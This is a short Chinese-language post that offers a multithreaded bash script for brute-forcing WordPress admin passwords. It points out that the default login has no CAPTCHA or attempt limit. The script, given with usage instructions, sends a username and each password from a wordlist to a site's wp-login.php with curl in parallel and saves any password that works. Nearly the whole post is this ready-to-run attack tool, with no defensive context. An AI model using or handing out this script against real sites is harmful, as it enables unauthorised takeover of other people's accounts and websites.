/ curl

多线程WordPress密码暴力破解工具(Shell)

请先确认已安装curl。

在默认情况下WordPress后台登录没有验证码,也没有登录失败次数限制,所以可以暴力破解。

!/bin/bash #by leo108 #使用方式:./wp-pwd.sh 用户名 字典 登录页面 线程数 #例如: ./wp-pwd.sh leo 1.txt http://xxx.com/wp-login.php 15 user=$1 zidian=$2 url=$3 thread=$4 function guess { curl -s -d "log=$user&pwd=$1" $url >> $1.html l=$(wc -l $1.html¦ awk -F[:" "]+ '{print $1}') if [ 0 -eq $l ]; then echo $1 >> pwd.txt rm $1.html return 1 else rm $1.html return 0 fi } if [ -e pwd.txt ]; then rm pwd.txt fi tmp_fifofile="/tmp/$$.fifo" mkfifo $tmp_fifofile exec 6<>$tmp_fifofile rm $tmp_fifofile for ((i=0;i<$thread;i++)); do echo done >&6 while read line;do if [ -e pwd.txt ]; then break fi read -u6 { echo "Testing "$line guess $line echo >&6 } & done < $zidian wait exec 6>&- if [ -e pwd.txt ]; then echo "Password is " cat pwd.txt rm pwd.txt else echo "Not Found" fi exit 0

多线程WordPress密码暴力破解工具(Shell)
Share this